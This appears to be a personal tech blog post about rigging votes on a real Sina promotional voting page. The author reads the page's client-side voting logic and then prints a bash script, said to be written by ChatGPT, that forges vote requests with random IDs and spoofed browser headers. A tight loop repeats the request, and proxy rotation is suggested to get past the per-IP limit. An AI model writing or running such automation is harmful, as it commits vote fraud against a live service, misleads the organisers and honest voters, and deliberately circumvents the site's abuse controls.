Relatives gave me a Sina voting link and asked me to help vote.
The address is http://h5.locate.sina.com.cn/h5/year/activity/.
This platform does not require WeChat login. I voted using my own browser to see the request.
callback=jQuery1830560859883008xxx_171833334xxx&uid=5&uu=444192xxxx&_=171833338xxxx
Let's take a look at the JavaScript code to see if it's encrypted.
Obviously, it's not encrypted, but I didn't see the voting logic code in it.
Let's check the page elements.
It's not hidden. The logic code is directly written in the HTML.
Let's go straight to the key part.
if(!localStorage.getItem('uu')){
localStorage.setItem('uu', Math.ceil(Math.random()*10000000000));
}
$(".n").on("click",function (){
var index=$(this).parents("li").index();
var uu=localStorage.getItem('uu');
console.log(index);
$.ajax({
url: URL+'u',
type:'get',
data: {uid:index+1,uu:uu},
dataType: "jsonp",
jsonp: "callback",
success: function(res) {
if(res.info){
//alert(res.info);
$(".tips").text(res.info).fadeIn();
setTimeout(function (){
$(".tips").fadeOut();
},2000);
newslist(index); //数据刷新
return 0;
}
}
});
These two code snippets are basically the entire voting logic.
The main thing is to pass three parameters: callback, uid, and uu.
Regarding callback, it's a regular jQuery request to the backend interface. The parameter is jQuery followed by any number, and then an underscore followed by a timestamp.
uid is the voting item.
uu is the voting verification. But I've already written the code for it above (why do you need to verify when you've already exposed it in plain text), it should be to prevent replay attacks.
Then, simulate a normal user with a request header.
Let ChatGPT write a script.
#!/bin/bash
# blog.baka.plus Please indicate the source when reprinting
# Define the target URL
BASE_URL="http://admin.h5sina.com/activity/index/u"
# Generate a random uu value, use the stored value if it already exists
if [ -z "$LOCAL_UU" ]; then
LOCAL_UU=$(shuf -i 1-10000000000 -n 1)
fi
# Define other necessary parameters
UID11=5 # Avoid using uid to prevent conflicts with system variables
TIMESTAMP=$(date +%s%N | cut -b1-13)
CALLBACK="jQuery183044178990760114514_$TIMESTAMP"
# Build the complete URL
URL="$BASE_URL?callback=$CALLBACK&uid=$UID11&uu=$LOCAL_UU&_=$TIMESTAMP" # The last parameter can be omitted to prevent caching, but to be consistent with normal requests, it is still included
# Execute the curl request
curl "$URL" \
-H 'Accept: */*' \
-H 'Accept-Language: zh-CN,zh;q=0.9' \
-H 'Connection: keep-alive' \
-H 'Referer: http://h5.xxx.sina.com.cn/' \
-H 'User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36'
Run it in a loop.
while true
do
bash script.sh
sleep 0.1
done
Because each IP can only vote three times, you need to change the proxy after voting three times. I won't go into detail here.
This article is synchronized and updated to xLog by Mix Space.
The original link is https://blog.baka.plus/posts/tech/sina-vote-platform-vote-manipulation